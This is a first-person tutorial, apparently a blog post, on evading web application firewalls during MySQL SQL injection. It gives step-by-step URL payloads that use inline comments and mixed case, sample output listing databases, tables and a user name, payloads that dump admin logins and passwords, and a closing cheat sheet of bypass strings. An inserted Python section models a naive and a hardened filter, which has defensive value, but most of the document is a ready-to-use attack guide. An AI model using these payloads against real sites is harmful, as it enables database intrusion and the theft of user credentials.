OK, so I showed you how to perform some basic SQLi previously, but there will be times when it starts off working and then you find yourself facing a 403 Forbidden page (or a 406 Not Acceptable). Typically you find the vulnerable page and the column count without trouble, and then as soon as you switch to a UNION SELECT statement the errors start. This is usually a server-side rule set filtering your request, often referred to as a Web Application Firewall or WAF, but don't worry, there are ways around it. You can get pretty creative with the methods, but for now I will show how to use comments to bypass the filters, sometimes referred to as inline comments or C comments. The trick relies on MySQL-specific syntax: anything inside /*! ... */ looks like a comment to a naive keyword filter, but MySQL itself executes it (and if a five-digit version number follows the !, as in /*!50000select*/, only servers at or above that version execute it). So /*!UNION*/ /*!SELECT*/ reaches the database as UNION SELECT while never matching the filter's pattern. I also mix upper and lower case in keywords throughout, which beats case-sensitive filters for the same reason.
I will re-use some of my previous examples and assume the following steps have gotten us to where we are now: the first two confirm the injection point, ORDER BY finds the column count, and the plain UNION SELECT is what triggers the 403. One caveat on the trailing comment: MySQL only treats -- as a comment when it is followed by whitespace, so if a bare -- at the end of the URL misbehaves, use --+ (the + decodes to a space) or -- -.
http://www.site.com/index.php?id=725
http://www.site.com/index.php?id=725'
http://www.site.com/index.php?id=725+ORDER+BY+1,2,3,4,5,6,7,8--
http://www.site.com/index.php?id=725+UNION+SELECT+1,2,3,4,5,6,7,8-- (403 Forbidden)
http://www.site.com/index.php?id=-725+UNION+SELECT+1,2,3,4,5,6,7,8-- (403 Forbidden)
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,7,8--
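To see why the comment trick works, here is an added Python example (my own illustration, not code from the original post or from any real WAF product). It pairs a naive keyword filter of the kind that produced the 403 with a hardened version that first normalises the request into the statement text MySQL would actually run, and it also shows why a sanitiser that deletes keywords in a single pass is beaten by the UNIunionON+SELselectECT payload listed at the end of this post. The payload strings are constructed for the example; the id parameter and the eight-column layout are the ones assumed above.

```python
import re
from urllib.parse import unquote_plus

# The rule we assume the 403 came from: "UNION", whitespace, "SELECT", any case.
UNION_SELECT = re.compile(r"\bUNION\s+SELECT\b", re.IGNORECASE)


def naive_waf_blocks(query_string: str) -> bool:
    """Naive WAF: URL-decode, then match the rule against the text as written."""
    return UNION_SELECT.search(unquote_plus(query_string)) is not None


def as_mysql_sees_it(query_string: str) -> str:
    """Rewrite the raw query string into the statement text MySQL would execute.

    - '+' and %XX escapes are URL-decoded by the web server first.
    - /*!...*/ and /*!50000...*/ are executable comments: MySQL drops the markers
      (and the optional five-digit version) and runs what is inside.
    - Ordinary /* ... */ comments are just whitespace to the parser.
    - Keywords are case-insensitive, so the text is upper-cased for comparison.
    """
    s = unquote_plus(query_string)
    s = re.sub(r"/\*!(?:\d{5})?(.*?)\*/", r"\1", s, flags=re.DOTALL)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.DOTALL)
    s = re.sub(r"\s+", " ", s)
    return s.strip().upper()


def hardened_waf_blocks(query_string: str) -> bool:
    """Hardened WAF: normalise first, then apply the very same rule."""
    return UNION_SELECT.search(as_mysql_sees_it(query_string)) is not None


def strip_keywords_once(query_string: str) -> str:
    """A 'sanitiser' that deletes the keywords in a single pass.

    Deleting the inner 'union' in UNIunionON re-creates the outer UNION,
    so the sanitised string still carries the keywords it tried to remove.
    """
    return re.sub(r"union|select", "", query_string, flags=re.IGNORECASE)


def strip_keywords_to_fixpoint(query_string: str) -> str:
    """The same sanitiser repeated until nothing changes; nested keywords cannot survive."""
    previous = None
    while previous != query_string:
        previous, query_string = query_string, strip_keywords_once(query_string)
    return query_string


if __name__ == "__main__":
    # Constructed payloads mirroring the walkthrough above.
    payloads = [
        "id=-725+UNION+SELECT+1,2,3,4,5,6,7,8--+",
        "id=-725+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,7,8--+",
        "id=-725+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--+",
    ]
    for p in payloads:
        print(p)
        print("  naive blocks:", naive_waf_blocks(p), " hardened blocks:", hardened_waf_blocks(p))
        print("  mysql sees  :", as_mysql_sees_it(p))
    nested = "UNIunionON+SELselectECT"
    print(nested, "-> once:", repr(strip_keywords_once(nested)),
          "-> fixpoint:", repr(strip_keywords_to_fixpoint(nested)))
```

The point of the hardened version is that the rule itself is unchanged; it only runs after the same decoding and comment handling the database applies. That is also the lesson for defenders: a filter that does not decode and normalise the way the backend does is only testing strings the backend never sees.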
Now there is no more 403 Forbidden message stopping you and you can see the vulnerable columns displayed on the page. I will re-use my examples and assume columns 6 and 8 are vulnerable. Now that we have the vulnerable columns we can extract some data, but let's first find some basic info. We will use CONCAT in column 6 to grab the current database name, the current user, and the version info. The mixed case in ConCAt is just another filter-evasion trick; the function is the same either way. CONCAT joins the values with nothing in between, so if the three run together on the page, put a separator such as 0x3a (a colon) between them, as the later payloads do.
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,ConCAt(database(),user(),version()),7,8--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,CONCAT(database(),user(),version()),7,8--
Results:
Version = 5.5.32-cll
User = k8806067_pt@localhost
Database() = k8806067_dbpt
It worked; we now know the current database name, user name and version, neatly displayed on the page for us. These two techniques, inline comments and mixed case, can be combined throughout your injections to evade filters, as you will see. Now let us try to get the list of all databases available, instead of just the current one. Note that the remaining payloads in this post come from a five-column page where column 2 renders; on the eight-column page above you would keep eight values and put GROUP_CONCAT in column 6. Also keep in mind that GROUP_CONCAT output is cut off at group_concat_max_len, which defaults to 1024 characters, so a long list may come back truncated. Like so:
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(SCHEMA_NAME),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
Results:
Information_Schema
k8806067_dblibrary
k8806067_dbperkara
k8806067_dbperpus
k8806067_dbpt
This should now show us the available databases! Now let us check for the tables tied to the current database. The WHERE TABLE_SCHEMA=DATABASE() clause restricts the list to the current database; drop it, as the second payload does, and you get every table the user can see across all schemas. The third variant selects table_name directly instead of wrapping it in GROUP_CONCAT, so the page will typically render only the first row returned; add LIMIT 0,1, then LIMIT 1,1 and so on to walk through the rest.
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TABLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEMA*/.TABLES--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,/*!table_name*/,3,4,5+from+/*!information_schema*/./*!tables*/+where+table_schema=database()--
TABLES FOUND:
detail_kategori
detail_kfoto
kategori
t_footer
etc.
Now we have all of the tables for the current database displayed on the page without any 403 holding us back. We can get columns using the same method as in the Basic SQLi 101 examples, but we keep the comment and capitalization techniques alive so it gets past the WAF. Reminder: hex-encode your table name so the payload needs no quotes, which filters often block; 0x41646d696e below is the hex for Admin. The second payload has no table filter and instead lists the columns of every table in the current database.
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEMA*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,/*!column_name*/,3,4,5+from+/*!information_schema*/./*!columns*/+where+table_schema=database()--
The page will now display the list of columns from the Admin table in the vulnerable column 2 spot. In this example we will assume we found the following column names (these are the ones used in the tblpengguna dump at the end).
COLUMNS FOUND:
tblpengguna_id
tblpengguna_login
tblpengguna_pass
OK, now we know the tables and their associated columns. It is time to extract some data, and it goes the same as it did in the Basic SQLi tutorial. The 0x3a (colon) and 0x7c (pipe) literals are separators between the fields so you can tell them apart on the page. The first payload dumps the Admin table from the Basic post; the second dumps the tblpengguna table whose columns we just found. Wrapping the column list in /*! */ hides those names from the filter, and the outer unhex(hex()) converts the result to a binary string, which sidesteps the "illegal mix of collations" error some servers throw on UNION.
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0x3a,login,0x3a,password,0x3a,email,0x3a),3,4,5+FROM+Admin--
or
http://www.site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,unhex(hex(group_concat(/*!tblpengguna_id,0x7c,tblpengguna_login,0x7c,tblpengguna_pass*/))),3,4,5+from+tblpengguna--
Alright, you have successfully gotten past a WAF! That sums up my coverage of WAF bypassing; I hope you have enjoyed it and found it informative. If you did, please check back often to see what new pages get added, and if you feel I missed anything let me know so I can update things accordingly. Below is some additional material that may be useful on this topic. As always, enjoy!
Other Bypass Techniques

Union Select bypass
Code:
union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/

After the id number, e.g. id=1+/*!and*/+1=0 (anything that makes the original row false, so only the UNION rows render)
Code:
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

False, in the URL itself
Code:
id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select

Order by bypassing, do it like this
Code:
/*!table_name*/+from+/*!information_schema*/./*!tables*/+where+table_schema=database()
unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
(char(37,112,97,115,115,37) is '%pass%', so the last one finds password columns without a quoted string)

Used with order:
Code:
convert(... using ascii)
unhex(hex())

If ascii doesn't work you could try:
Code:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u